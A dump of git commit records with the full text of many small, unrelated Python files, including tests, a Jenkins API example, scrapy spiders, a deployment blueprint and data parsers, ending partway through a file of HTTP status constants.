# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def test_dummy():
assert 1 + 1 == 2
| apache-2.0 | Python |
|
5d795253180ef11117ae27447fa597fa15b40734 | Add testing for graphing code | LaurEars/codegrapher | tests/test_graph.py | tests/test_graph.py | import os
from click.testing import CliRunner
from cli.script import cli
def get_graph_code():
return '''
from copy import deepcopy as dc
class StringCopier(object):
def __init__(self):
self.copied_strings = set()
def copy(self):
string1 = 'this'
string2 = dc(string1)
string1.add(string1)
return string2
class DoSomething(object):
def something(self):
copier = StringCopier()
copied_string = copier.copy()
'''
def test_produce_graph():
runner = CliRunner()
with runner.isolated_filesystem():
with open('code.py', 'w') as f:
f.write(get_graph_code())
runner.invoke(cli, ['code.py', '--output', 'code_output'])
assert 'code_output' in os.listdir(os.path.curdir)
assert 'code_output.pdf' in os.listdir(os.path.curdir)
def test_file_extension():
runner = CliRunner()
with runner.isolated_filesystem():
with open('code.py', 'w') as f:
f.write(get_graph_code())
runner.invoke(cli, ['code.py', '--output', 'code_output', '--output-format', 'png'])
assert 'code_output' in os.listdir(os.path.curdir)
assert 'code_output.png' in os.listdir(os.path.curdir)
assert 'code_output.pdf' not in os.listdir(os.path.curdir)
| mit | Python |
|
66989005b6e9443c65c082ea1c2e4386ffae1330 | Add a few basic pages tests ahead of #406 | bountysource/www.gittip.com,mccolgst/www.gittip.com,MikeFair/www.gittip.com,studio666/gratipay.com,mccolgst/www.gittip.com,mccolgst/www.gittip.com,gratipay/gratipay.com,eXcomm/gratipay.com,eXcomm/gratipay.com,studio666/gratipay.com,studio666/gratipay.com,gratipay/gratipay.com,mccolgst/www.gittip.com,MikeFair/www.gittip.com,eXcomm/gratipay.com,bountysource/www.gittip.com,eXcomm/gratipay.com,studio666/gratipay.com,bountysource/www.gittip.com,MikeFair/www.gittip.com,gratipay/gratipay.com,bountysource/www.gittip.com,gratipay/gratipay.com | tests/test_pages.py | tests/test_pages.py | from gittip.testing import serve_request, load, setup_tips
def test_homepage():
actual = serve_request('/').body
expected = "Gittip happens every Thursday."
assert expected in actual, actual
def test_profile():
with load(*setup_tips(("cheese", "puffs", 0))):
expected = "I’m grateful for tips"
actual = serve_request('/cheese/').body
assert expected in actual, actual
def test_widget():
with load(*setup_tips(("cheese", "puffs", 0))):
expected = "javascript: window.open"
actual = serve_request('/cheese/widget.html').body
assert expected in actual, actual
# These hit the network.
def test_github_proxy():
expected = "<b>lgtest</b> has not joined"
actual = serve_request('/on/github/lgtest/').body
assert expected in actual, actual
def test_twitter_proxy():
expected = "<b>Twitter</b> has not joined"
actual = serve_request('/on/twitter/twitter/').body
assert expected in actual, actual
| cc0-1.0 | Python |
|
7a5b46d5a9d0e45b928bcadfeb91a6285868d8f3 | Create medium_RunLength.py | GabrielGhe/CoderbyteChallenges,GabrielGhe/CoderbyteChallenges | medium_RunLength.py | medium_RunLength.py | """
Determine the run length
of a string
ex: aaabbrerr > 3a2b1r1e2r
"""
def RunLength(string):
val = string[0]
count = 1
ret = ""
for char in string[1:]:
if char != val:
ret += str(count)
ret += val
val = char
count = 1
else:
count += 1
ret += str(count)
ret += val
return ret
# keep this function call here
# to see how to enter arguments in Python scroll down
print RunLength(raw_input())
| mit | Python |
|
f3c8117755537ca96c3c8c72d5f54b8c244c260b | add top-level class | jobovy/mwdust,jobovy/mwdust | mwdust/DustMap3D.py | mwdust/DustMap3D.py | ###############################################################################
#
# DustMap3D: top-level class for a 3D dust map; all other dust maps inherit
# from this
#
###############################################################################
class DustMap3D:
"""top-level class for a 3D dust map; all other dust maps inherit from this"""
def __init__(self):
"""
NAME:
__init__
PURPOSE:
Initialize the dust map
INPUT:
OUTPUT:
HISTORY:
2013-11-24 - Started - Bovy (IAS)
"""
return None
def __call__(self,*args,**kwargs):
"""
NAME:
__call__
PURPOSE:
evaluate the dust map
INPUT:
OUTPUT:
HISTORY:
2013-11-24 - Started - Bovy (IAS)
"""
raise NotImplementedError("'__call__' for this DustMap3D not implemented yet")
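# Illustrative subclass sketch (hypothetical; a real map would return actual
# extinction values rather than a constant):
#   class ZeroDustMap(DustMap3D):
#       def __call__(self, *args, **kwargs):
#           return 0.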
| bsd-3-clause | Python |
|
20cebf2b93a310dac4c491b5a59f1a2846f51073 | Add basic implementation | ZhukovAlexander/triegex | triegex/__init__.py | triegex/__init__.py | __all__ = ('Triegex',)
class TriegexNode:
def __init__(self, char: str, childrens=()):
self.char = char
self.childrens = {children.char: children for children in childrens}
def render(self):
if not self.childrens:
return self.char
return self.char + r'(?:{0})'.format(
r'|'.join(
[children.render() for key, children in sorted(self.childrens.items())]
)
)
class Triegex:
def __init__(self, *words):
self._root = TriegexNode('')
for word in words:
self.add(word)
def add(self, word: str):
current = self._root
for letter in word:
current = current.childrens.setdefault(letter, TriegexNode(letter))
def render(self):
return self._root.render()
def __iter__(self):
return self
if __name__ == '__main__':
triegex = Triegex('spam', 'eggs')
triegex.add('foo')
triegex.add('bar')
triegex.add('baz')
print(triegex.render())
import re
print(re.findall(triegex.render(), 'baz spam eggs')) | mit | Python |
|
a4ba072e7a136fe1ebb813a1592bf5c378fd855b | 优化了乌龟吃鱼游戏” | Zhaominxin/MyProject,Zhaominxin/MyProject | turtle_fish_game.py | turtle_fish_game.py | import random
class Turtle:
    def __init__(self, name):
        self.name = name
        # instance attributes: defined as class attributes, every turtle would
        # share a single starting position rolled once at class-definition time
        self.energy = 50
        self.x = random.randint(0, 10)
        self.y = random.randint(0, 10)
def moving(self):
move = random.choice([-2,-1,1,2])
direction = random.choice(['x','y'])
        print('Turtle{0} moves {1} on {2}'.format(self.name, move, direction))
if direction == 'x':
position = self.x + move
if 0 <= position <= 10:
self.x += move
elif position < 0:
self.x = - (self.x + move)
elif position > 10:
self.x = 10 + (10 - (self.x + move))
if direction == 'y':
position = self.y + move
if 0 <= position <= 10:
self.y += move
elif position < 0:
self.y = - (self.y + move)
elif position > 10:
self.y = 10 + (10 - (self.y + move))
self.energy -= 1
        print('Turtle{0} Position: x={1}, y={2}, energy={3}'.format(self.name, self.x, self.y, self.energy))
class Fish:
    def __init__(self, name):
        self.name = name
        # instance attributes, for the same reason as in Turtle
        self.x = random.randint(0, 10)
        self.y = random.randint(0, 10)
def moving(self):
move = random.choice([-1, 1])
direction = random.choice(['x','y'])
if direction == 'x':
position = self.x + move
if 0 <= position <= 10:
self.x += move
elif position < 0:
self.x = - (self.x + move)
elif position > 10:
self.x = 10 + (10 - (self.x + move))
if direction == 'y':
position = self.y + move
            if 0 <= position <= 10:  # same bounds as the x direction
self.y += move
elif position < 0:
self.y = - (self.y + move)
elif position > 10:
self.y = 10 + (10 - (self.y + move))
print('Fish{0} Position: x={1}, y={2}'.format(self.name, self.x, self.y))
class Pool:
def __init__(self, turtle_num=2, fish_num=10):
self.turtle_num = turtle_num
self.fish_num = fish_num
self.turtle_list = []
for i in range(self.turtle_num):
self.turtle_list.append(Turtle(str(i+1)))
self.fish_list = []
for i in range(self.fish_num):
self.fish_list.append(Fish(str(i+1)))
pool = Pool(3,10)
while len(pool.turtle_list) > 0 and len(pool.fish_list) > 0:
    for each in pool.turtle_list[:]:  # iterate over a copy: turtles may be removed
if each.energy > 0:
each.moving()
else:
pool.turtle_list.remove(each)
            print('Turtle{0} has no energy!!!!'.format(each.name))
    for eachfish in pool.fish_list[:]:  # copy again: fish may be eaten mid-loop
eachfish.moving()
for eachturtle in pool.turtle_list:
if eachfish.x == eachturtle.x and eachfish.y == eachturtle.y:
                print('Turtle{0} catches Fish{1}!! It gets 20 energy!!!'.format(eachturtle.name, eachfish.name))
                eachturtle.energy += 20
                pool.fish_list.remove(eachfish)
                break  # this fish is gone; stop checking the remaining turtles
if len(pool.fish_list) == 0:
        print('There are no fish left!! Game Over!!')
if len(pool.turtle_list) == 0:
print('The turtles have no energy!! Game Over!!!')
# Log:
# In the June version (the L37_t1_turtle.py homework), the turtle and the ten
# fish objects were all created by hand.
# The Pool class added in the October rework initializes the turtles and fish
# at the same time the pool object itself is built.
# Events inside the pool never need an object's name, so there is no point
# agonizing over visible variable names; just put the objects in lists and
# iterate over them.
| mit | Python |
|
465956eb780ace1835e08ca2c87895d7ff1326cf | save a legacy script, may have to use again some year | akrherz/pyWWA,akrherz/pyWWA | util/wisc_ingest.py | util/wisc_ingest.py | import subprocess
import os
import glob
import mx.DateTime
sts = mx.DateTime.DateTime(2011,12,1)
ets = mx.DateTime.DateTime(2012,1,1)
WANT = ['EAST-CONUS','NHEM-COMP','SUPER-NATIONAL','NHEM-MULTICOMP','WEST-CONUS']
def dodate(now, dir):
base = now.strftime("/mesonet/gini/%Y_%m_%d/sat/"+dir)
for (d2,bogus,files) in os.walk(base):
if len(files) == 0:
continue
for file in files:
cmd = "cat %s/%s | /usr/bin/python gini2gis.py" % (d2, file)
print cmd
subprocess.call(cmd, shell=True)
now = sts
while now < ets:
for dir in WANT:
dodate(now, dir)
now += mx.DateTime.RelativeDateTime(days=1)
| mit | Python |
|
099151db3a18384ebb4b7abc17c1a38567e5d2cb | add crash scan for reporting | Mozilla-TWQA/mtbf_operation,zapion/mtbf_operation,ShakoHo/mtbf_operation | utils/crash_scan.py | utils/crash_scan.py | #!/usr/bin/python
import subprocess
import re
import os
p = subprocess.Popen(['adb', 'devices'], stdout=subprocess.PIPE)
res = p.communicate()[0].split('\n')
res.pop(0)
devices = []
for li in res:
m = re.search('(\w+)', li)
if(m is not None):
devices.append(m.group(0))
total_crash_num = 0
crash_stat_url = 'https://crash-stats.mozilla.com/report/index/'
for dev in devices:
os.environ['ANDROID_SERIAL'] = dev
crash_num = 0
base_dir = "/data/b2g/mozilla/Crash Reports/"
scan_cmd = ['adb', 'shell', 'ls -l']
submit_dir = base_dir + 'submitted'
pending_dir = base_dir + 'pending'
    p = subprocess.Popen(scan_cmd + ['"%s"' % submit_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)  # quote: the path contains a space and adb shell joins its arguments
output = p.communicate()[0]
crash_id = []
if "No such" not in output:
for out in output.split('\n'):
if out.strip() != "":
cid = re.search('\sbp-(\S+)\.txt$', out.strip()).group(1)
crash_id.append(cid)
crash_num += 1
    q = subprocess.Popen(scan_cmd + ['"%s"' % pending_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = q.communicate()[0]
if "No such" not in output:
for out in output.split('\n'):
if out.strip() != "":
crash_num += 1
print("device " + dev + " has " + str(crash_num) + " crashes.")
total_crash_num += crash_num
if crash_id:
print("Submitted: ")
for cid in crash_id:
print(crash_stat_url + cid)
print("Total crash number = " + str(total_crash_num))
| mpl-2.0 | Python |
|
9ddb89b4b652fb3026632ffd79dea9321f58cc31 | bump version in __init__.py | 1flow/1flow,1flow/1flow,WillianPaiva/1flow,WillianPaiva/1flow,1flow/1flow,WillianPaiva/1flow,1flow/1flow,WillianPaiva/1flow,1flow/1flow,WillianPaiva/1flow | oneflow/__init__.py | oneflow/__init__.py |
VERSION = '0.16.4'
|
VERSION = '0.16.3.1'
| agpl-3.0 | Python |
9d994180a38976939e5da1757303ef8ed76f5e07 | bump version in __init__.py | WillianPaiva/1flow,1flow/1flow,1flow/1flow,1flow/1flow,1flow/1flow,1flow/1flow,WillianPaiva/1flow,WillianPaiva/1flow,WillianPaiva/1flow,WillianPaiva/1flow | oneflow/__init__.py | oneflow/__init__.py |
VERSION = '0.19.1'
|
VERSION = '0.19'
| agpl-3.0 | Python |
aaca641f968bf12eb2177460f8cf809d62ea3bd4 | Add a strict version of itertools.groupby | lamby/buildinfo.debian.net,lamby/buildinfo.debian.net | bidb/utils/itertools.py | bidb/utils/itertools.py | from __future__ import absolute_import
import itertools
def groupby(iterable, keyfunc, sortfunc=lambda x: x):
return [
(x, list(sorted(y, key=sortfunc)))
for x, y in itertools.groupby(iterable, keyfunc)
]
| agpl-3.0 | Python |
|
d2c414576cfcf935ed36ffe2c5fb594911be0832 | work on sge module started | sfranky/qtop,fgeorgatos/qtop,sfranky/qtop,qtop/qtop,qtop/qtop,fgeorgatos/qtop,fgeorgatos/qtop,qtop/qtop | sge.py | sge.py | from collections import OrderedDict
__author__ = 'sfranky'
from lxml import etree
fn = '/home/sfranky/PycharmProjects/results/gef_sge1/qstat.F.xml.stdout'
tree = etree.parse(fn)
root = tree.getroot()
def extract_job_info(elem, elem_text):
"""
inside elem, iterates over subelems named elem_text and extracts relevant job information
"""
jobs = []
for subelem in elem.iter(elem_text):
job = dict()
job['job_state'] = subelem.find('./state').text
job['job_name'] = subelem.find('./JB_name').text
job['job_owner'] = subelem.find('./JB_owner').text
job['job_slots'] = subelem.find('./slots').text
job['job_nr'] = subelem.find('./JB_job_number').text
jobs.append(job)
# print '\t' + job['job_state'], job['job_name'], job['job_owner'], job['job_slots'], job['job_nr']
return jobs
worker_nodes = list()
for queue_elem in root.iter('Queue-List'):
d = OrderedDict()
queue_name = queue_elem.find('./resource[@name="qname"]').text
d['domainname'] = host_name = queue_elem.find('./resource[@name="hostname"]').text
slots_total = queue_elem.find('./slots_total').text
d['np'] = queue_elem.find('./resource[@name="num_proc"]').text
slots_used = queue_elem.find('./slots_used').text
slots_resv = queue_elem.find('./slots_resv').text
# print queue_name, host_name, slots_total, slots_used, slots_resv
running_jobs = extract_job_info(queue_elem, 'job_list')
d['core_job_map'] = [{'core': idx, 'job': job['job_nr']} for idx, job in enumerate(running_jobs)]
worker_nodes.append(d)
job_info_elem = root.find('./job_info')
# print 'PENDING JOBS'
pending_jobs = extract_job_info(job_info_elem, 'job_list')
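# Each worker_nodes entry ends up shaped roughly like (illustrative values):
#   {'domainname': 'node1.example.org', 'np': '8',
#    'core_job_map': [{'core': 0, 'job': '1234'}, ...]}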
| mit | Python |
|
482a2639911b676bf68dcd529dcc1ffecaaf10ea | Create shortner.py | WebShark025/ZigZag-v2,WebShark025/ZigZag-v2,WebShark025/ZigZag-v2 | plugins/shortner.py | plugins/shortner.py | mit | Python |
||
5ae58621bd766aeaa6f1838397b045039568887c | Add driver to find plate solutions | dkirkby/babeldix | platesolve.py | platesolve.py | import babeldix
import sys
import operator
# Print solutions in order of increasing score
for plate in sys.argv[1:]:
solns = babeldix.Plates.get_solutions(plate)
for (soln,score) in sorted(solns.items(), key=operator.itemgetter(1)):
print '{0:s} {1:d} {2:s}'.format(plate,score,soln)
| mit | Python |
|
c1bfe92878edc3f9598a6d97046775cb8d9b0aa0 | Make migration for item-visibility change | verleihtool/verleihtool,verleihtool/verleihtool,verleihtool/verleihtool,verleihtool/verleihtool | depot/migrations/0009_auto_20170330_1342.py | depot/migrations/0009_auto_20170330_1342.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-30 13:42
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('depot', '0008_auto_20170330_0855'),
]
operations = [
migrations.AlterField(
model_name='item',
name='visibility',
field=models.CharField(choices=[('1', 'public'), ('2', 'private'), ('3', 'deleted')], max_length=1),
),
]
| agpl-3.0 | Python |
|
03ecddce6f34d04957ca5161eb7d776daf02ed47 | Add blobdb messages | pebble/libpebble2 | protocol/blobdb.py | protocol/blobdb.py | __author__ = 'katharine'
from base import PebblePacket
from base.types import *
class InsertCommand(PebblePacket):
key_size = Uint8()
key = BinaryArray(length=key_size)
value_size = Uint16()
value = BinaryArray(length=value_size)
class DeleteCommand(PebblePacket):
key_size = Uint8()
key = BinaryArray(length=key_size)
class ClearCommand(PebblePacket):
pass
class BlobCommand(PebblePacket):
command = Uint8()
token = Uint16()
database = Uint8()
content = Union(command, {
0x01: InsertCommand,
0x04: DeleteCommand,
0x05: ClearCommand,
})
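# Construction sketch (hypothetical; assumes PebblePacket accepts its declared
# fields as keyword arguments, which this prototype does not show):
#   insert = InsertCommand(key_size=3, key=b'abc', value_size=2, value=b'hi')
#   packet = BlobCommand(command=0x01, token=1, database=4, content=insert)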
| mit | Python |
|
cf0310a7111bdb79b4bbe2a52095c8344778c80c | Add admin.py for protocols | Hackfmi/Diaphanum,Hackfmi/Diaphanum | protocols/admin.py | protocols/admin.py | from django.contrib import admin
from .models import Protocol
admin.site.register(Protocol) | mit | Python |
|
98ed7f3f682bf1ba23bb0030aa81e8fff23e54ad | Add harvester | erinspace/scrapi,fabianvf/scrapi,felliott/scrapi,CenterForOpenScience/scrapi,fabianvf/scrapi,felliott/scrapi,erinspace/scrapi,CenterForOpenScience/scrapi | scrapi/harvesters/uow.py | scrapi/harvesters/uow.py | '''
Harvester for the Research Online for the SHARE project
Example API call: http://ro.uow.edu.au/do/oai/?verb=ListRecords&metadataPrefix=oai_dc
'''
from __future__ import unicode_literals
from scrapi.base import OAIHarvester
class UowHarvester(OAIHarvester):
short_name = 'uow'
long_name = 'University of Wollongong Research Online'
url = 'http://ro.uow.edu.au'
base_url = 'http://ro.uow.edu.au/do/oai/'
property_list = ['date', 'source', 'identifier', 'type', 'format', 'setSpec']
timezone_granularity = True
| apache-2.0 | Python |
|
1b4ca9e9afccfc1492aeea955f2cd3c783f1dc80 | Create file_parser.py | armatita/NCparser | file_parser.py | file_parser.py | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 19 17:03:35 2015
@author: pedro.correia
"""
from __future__ import division # Just making sure that correct integer division is working
import numpy as np # This is numpy,python numerical library
import xlrd as xcl # This library allow you to manipulate (read and write) excel files
import cPickle as pickle # Library used to save and load dictionaries
import objects_parser as obj # Our local objects library.
def __open_excel_book__(path):
"""
NOTE: internal function. Use open_excel_file function.
User gives a string path and this function returns the open excel book.
"""
book = xcl.open_workbook(path,on_demand=True)
return book
def __array_by_type__(sheet,col,null=-999):
"""
NOTE: internal function. Use open_excel_file function.
This function receives sheet and column number and returns an array with the
correct type. The null is by default -999 but you can change it on the third
argument.
"""
try:
float(sheet.cell_value(1, col))
return np.zeros(sheet.nrows,dtype=type(sheet.cell_value(1, col))),null
except ValueError:
return np.zeros(sheet.nrows,dtype='|S15'),str(null) #type(sheet.cell_value(1, col))),str(null)
def __build_excel_dictionary__(book,null=-999):
"""
NOTE: internal function. Use open_excel_file function.
Function that receives an excel book (see: __open_excel_book__) and extracts to
dictionaries (with numpy arrays) all information from the excel book. Empty
cells are given the null value (default is -999).
"""
sheet_dictionary = {}
for name in book.sheet_names():
sheet = book.sheet_by_name(name)
local_dictionary = {}
for col in xrange(sheet.ncols):
local_array,null = __array_by_type__(sheet,col,null)
for row in xrange(1,sheet.nrows):
if sheet.cell_type(row, col) in (xcl.XL_CELL_EMPTY, xcl.XL_CELL_BLANK):
local_array[row] = null
else:
local_array[row] = sheet.cell_value(row, col)
local_dictionary[sheet.cell_value(0, col)] = local_array
sheet_dictionary[name] = local_dictionary
return sheet_dictionary
def open_excel_file(path,null=-999):
"""
    Opens an excel file into an excelObject and returns it.
"""
book = __open_excel_book__(path)
data = obj.excelObject(__build_excel_dictionary__(book,null),null)
return data
def save_excel_object(path,obj):
"""
Saves excel object to file. Give path and excel object.
"""
with open(path, 'wb') as outfile:
pickle.dump(obj.me, outfile, protocol=pickle.HIGHEST_PROTOCOL)
def open_excel_object(path,null=-999):
"""
Creates an excel object from epy (pickle) loaded file.
"""
return obj.excelObject(pickle.load(open(path, "rb" )),null)
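# Example round trip (hypothetical file names):
#   data = open_excel_file('book.xls')
#   save_excel_object('book.epy', data)
#   data2 = open_excel_object('book.epy')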
| mit | Python |
|
26d364765cdb0e4e4bf755286d92c305b8dabb0c | Add files via upload | mzoorob/LAPOP-Projects,mzoorob/LAPOP-Projects | find_qCodes.py | find_qCodes.py | __author__ = 'zoorobmj'
import re
import csv
import os
if __name__ == '__main__':
folder = "C:\Users\zoorobmj\PycharmProjects\Question_Matrix" # my directory
files = [f for f in os.listdir(folder) if f.endswith('.txt')]
q_list = []
    for f in files:  # iterate the .txt files, not the characters of the folder path
        Qs = open(os.path.join(folder, f), 'r').read()
# print Qs
# find all meeting this pattern
# get unique values
# return as csv
q_codes = re.findall(r"[A-Z]+[A-Z0-9]*[.]", Qs)
q_list.append(q_codes)
with open("CoreESP2016.csv", 'wb') as output:
writer = csv.writer(output, lineterminator='\n')
for val in q_list:
if len(val)==2:
print val
else:
writer.writerow([val]) | cc0-1.0 | Python |
|
5ae45bfbbd6559d344eb641853ef8e83b3ff1c90 | Add wowza blueprint | chrippa/blues,5monkeys/blues,Sportamore/blues,adisbladis/blues,Sportamore/blues,andreif/blues,adisbladis/blues,5monkeys/blues,andreif/blues,andreif/blues,5monkeys/blues,adisbladis/blues,Sportamore/blues,chrippa/blues,chrippa/blues | blues/wowza.py | blues/wowza.py | """
Wowza Blueprint
===============
**Fabric environment:**
.. code-block:: yaml
blueprints:
- blues.wowza
"""
from fabric.decorators import task
from refabric.api import run, info
from refabric.context_managers import sudo
from refabric.contrib import blueprints
from . import debian
__all__ = ['start', 'stop', 'restart', 'setup', 'configure']
blueprint = blueprints.get(__name__)
start = debian.service_task('WowzaStreamingEngine', 'start')
stop = debian.service_task('WowzaStreamingEngine', 'stop')
restart = debian.service_task('WowzaStreamingEngine', 'restart')
wowza_root = '/usr/local/WowzaMediaServer/'
@task
def setup():
"""
Install and configure Wowza
"""
install()
configure()
def install():
with sudo():
info('Downloading wowza')
version = blueprint.get('wowza_version', '4.1.2')
binary = 'WowzaStreamingEngine-{}.deb.bin'.format(version)
version_path = version.replace('.', '-')
url = 'http://www.wowza.com/downloads/WowzaStreamingEngine-{}/{}'.format(version_path,
binary)
run('wget -P /tmp/ {url}'.format(url=url))
debian.chmod('/tmp/{}'.format(binary), '+x')
info('Installing wowza')
run('/tmp/{}'.format(binary))
@task
def configure():
"""
Configure Wowza
"""
| mit | Python |
|
0e53f398bf2cf885393865ec1f899308bb56625b | Add a low-level example for creating views. | mistermocha/jenkinsapi,imsardine/jenkinsapi,mistermocha/jenkinsapi,JohnLZeller/jenkinsapi,JohnLZeller/jenkinsapi,aerickson/jenkinsapi,zaro0508/jenkinsapi,imsardine/jenkinsapi,zaro0508/jenkinsapi,jduan/jenkinsapi,domenkozar/jenkinsapi,mistermocha/jenkinsapi,jduan/jenkinsapi,salimfadhley/jenkinsapi,salimfadhley/jenkinsapi,aerickson/jenkinsapi,JohnLZeller/jenkinsapi,domenkozar/jenkinsapi,imsardine/jenkinsapi,zaro0508/jenkinsapi | examples/create_a_view_low_level.py | examples/create_a_view_low_level.py | """
A low level example:
This is how JenkinsAPI creates views
"""
import requests
import json
url = 'http://localhost:8080/newView'
str_view_name = "ddsfddfd"
params = {}  # {'name': str_view_name}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = {
"mode": "hudson.model.ListView",
#"Submit": "OK",
"name": str_view_name
}
# Try 1
result = requests.post(url, params=params, data={'json':json.dumps(data)}, headers=headers)
print result.text.encode('UTF-8')
| mit | Python |
|
4c73cad398d5dac85b264187f709a860f356b311 | Add new file with mixin for mysql | KSchopmeyer/smipyping,KSchopmeyer/smipyping,KSchopmeyer/smipyping,KSchopmeyer/smipyping,KSchopmeyer/smipyping | smipyping/_mysqldbmixin.py | smipyping/_mysqldbmixin.py | #!/usr/bin/env python
# (C) Copyright 2017 Inova Development Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, absolute_import
from mysql.connector import MySQLConnection
class MySQLDBMixin(object):
"""
Provides some common methods to mixin in with the MySQL...Tables
classes
"""
def connectdb(self, db_dict, verbose):
"""Connect the db"""
try:
connection = MySQLConnection(host=db_dict['host'],
database=db_dict['database'],
user=db_dict['user'],
password=db_dict['password'])
if connection.is_connected():
self.connection = connection
if verbose:
print('sql db connection established. host %s, db %s' %
(db_dict['host'], db_dict['database']))
else:
print('SQL database connection failed. host %s, db %s' %
(db_dict['host'], db_dict['database']))
raise ValueError('Connection to database failed')
except Exception as ex:
raise ValueError('Could not connect to sql database %r. '
' Exception: %r'
% (db_dict, ex))
def _load_table(self):
"""
Load the internal dictionary from the database based on the
fields definition
"""
try:
cursor = self.connection.cursor(dictionary=True)
fields = ', '.join(self.fields)
sql = 'SELECT %s FROM %s' % (fields, self.table_name)
cursor.execute(sql)
rows = cursor.fetchall()
for row in rows:
key = row[self.key_field]
self.data_dict[key] = row
except Exception as ex:
raise ValueError('Error: setup sql based targets table %r. '
'Exception: %r'
% (self.db_dict, ex))
| mit | Python |
|
206c99420101655d7495000d659d571ef729300b | Add areas spider | tvl/scrapy-soccerway | soccerway/spiders/areas.py | soccerway/spiders/areas.py | # -*- coding: utf-8 -*-
import scrapy
from soccerway.items import Match
from urllib.parse import urlencode
class AreasSpider(scrapy.Spider):
name = "areas"
    allowed_domains = ["www.soccerway.mobi"]  # domain only; including the scheme breaks offsite filtering
start_urls = ['http://www.soccerway.mobi/?']
params = {
"sport": "soccer",
"page": "leagues",
"view" : "by_area",
"area_id" : "212",
"localization_id": "www"
}
def start_requests(self):
for i in range(8,11):
self.params['area_id'] = str(i)
request = scrapy.Request(url=self.start_urls[0]+urlencode(self.params), callback=self.parse)
request.meta['proxy'] = 'http://127.0.0.1:8118'
yield request
def parse(self, response):
self.log('URL: {}'.format(response.url))
"""
def parse(self, response):
venue = Venue()
venue['country'], venue['city'], venue['name'] = response.css('title::text')[0].extract().split(',')
res = response.xpath('//td//b/text()')
if len(res) > 0:
venue['opened'] = res[0].extract()
res = response.xpath('//td//b/text()')
if len(res) > 1:
venue['capacity'] = res[1].extract()
venue['lat'], venue['lng'] = response.xpath('//script/text()')[1].re(r'\((.*)\)')[1].split(',')
return venue
"""
| apache-2.0 | Python |
|
171de05d8ea4a31b0f97c38206b44826364d7693 | Add http_status.py | cortesi/mitmproxy,vhaupert/mitmproxy,ParthGanatra/mitmproxy,pombredanne/netlib,ddworken/mitmproxy,MatthewShao/mitmproxy,xaxa89/mitmproxy,ujjwal96/mitmproxy,jvillacorta/mitmproxy,mitmproxy/mitmproxy,mosajjal/mitmproxy,xaxa89/mitmproxy,ParthGanatra/mitmproxy,mitmproxy/mitmproxy,gzzhanghao/mitmproxy,ddworken/mitmproxy,mosajjal/mitmproxy,ddworken/mitmproxy,vhaupert/mitmproxy,gzzhanghao/mitmproxy,pombredanne/netlib,jvillacorta/mitmproxy,gzzhanghao/mitmproxy,fimad/mitmproxy,Kriechi/mitmproxy,cortesi/mitmproxy,xaxa89/mitmproxy,mhils/mitmproxy,fimad/mitmproxy,StevenVanAcker/mitmproxy,dufferzafar/mitmproxy,ujjwal96/mitmproxy,cortesi/mitmproxy,fimad/mitmproxy,akihikodaki/netlib,Kriechi/mitmproxy,dwfreed/mitmproxy,Kriechi/mitmproxy,mhils/mitmproxy,Kriechi/netlib,ikoz/mitmproxy,ujjwal96/mitmproxy,mitmproxy/mitmproxy,mhils/mitmproxy,ParthGanatra/mitmproxy,ParthGanatra/mitmproxy,akihikodaki/netlib,mitmproxy/mitmproxy,zlorb/mitmproxy,StevenVanAcker/mitmproxy,dufferzafar/mitmproxy,dufferzafar/mitmproxy,dufferzafar/mitmproxy,laurmurclar/mitmproxy,gzzhanghao/mitmproxy,ikoz/mitmproxy,tdickers/mitmproxy,zlorb/mitmproxy,ikoz/mitmproxy,mitmproxy/netlib,mhils/mitmproxy,tdickers/mitmproxy,mitmproxy/mitmproxy,dwfreed/mitmproxy,vhaupert/mitmproxy,laurmurclar/mitmproxy,vhaupert/mitmproxy,ddworken/mitmproxy,cortesi/mitmproxy,tdickers/mitmproxy,ikoz/mitmproxy,MatthewShao/mitmproxy,mosajjal/mitmproxy,MatthewShao/mitmproxy,zlorb/mitmproxy,StevenVanAcker/mitmproxy,Kriechi/mitmproxy,laurmurclar/mitmproxy,dwfreed/mitmproxy,jvillacorta/mitmproxy,mhils/mitmproxy,StevenVanAcker/mitmproxy,dwfreed/mitmproxy,xaxa89/mitmproxy,Kriechi/netlib,jvillacorta/mitmproxy,zlorb/mitmproxy,tdickers/mitmproxy,MatthewShao/mitmproxy,fimad/mitmproxy,ujjwal96/mitmproxy,laurmurclar/mitmproxy,mosajjal/mitmproxy | netlib/http_status.py | netlib/http_status.py |
CONTINUE = 100
SWITCHING = 101
OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207
MULTIPLE_CHOICE = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307
BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTH_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE_SPACE = 507
NOT_EXTENDED = 510
RESPONSES = {
# 100
